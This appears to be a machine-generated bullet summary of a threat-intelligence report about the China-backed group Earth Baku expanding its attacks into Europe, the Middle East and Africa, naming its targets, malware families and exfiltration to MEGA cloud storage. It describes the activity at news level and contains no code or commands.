August 14, 2024 at 02:03AM
Earth Baku, a China-backed threat actor, has expanded its targeting to Europe, the Middle East, and Africa, including countries like Italy, Germany, U.A.E., and Qatar. The group has updated its tactics, using public-facing applications for entry points and deploying sophisticated malware. Their attacks involve various post-exploitation tools and data exfiltration methods.
From the meeting notes, the key takeaways are:
– The China-backed threat actor Earth Baku has expanded its targeting beyond the Indo-Pacific region to include Europe, the Middle East, and Africa since late 2022.
– Newly targeted countries include Italy, Germany, the U.A.E., and Qatar, with suspected attacks in Georgia and Romania.
– Sectors singled out include governments, media and communications, telecoms, technology, healthcare, and education.
– The threat actor has updated its tools, tactics, and procedures (TTPs) in recent campaigns, using public-facing applications like IIS servers as entry points for attacks and deploying sophisticated malware toolsets in the victim’s environment.
– Trend Micro researchers have identified the threat actor’s use of malware families like DodgeBox (aka DUSTPAN) and MoonWalk (aka DUSTTRAP), which Trend Micro has named StealthReacher and SneakCross.
– Earth Baku is associated with APT41 and known for its use of StealthVector and post-exploitation tools such as iox, Rakshasa, and a VPN service known as Tailscale.
– Data exfiltration is accomplished through a command-line utility dubbed MEGAcmd to the MEGA cloud storage service.
These clear takeaways can be utilized for further analysis and decision-making related to cybersecurity and threat intelligence.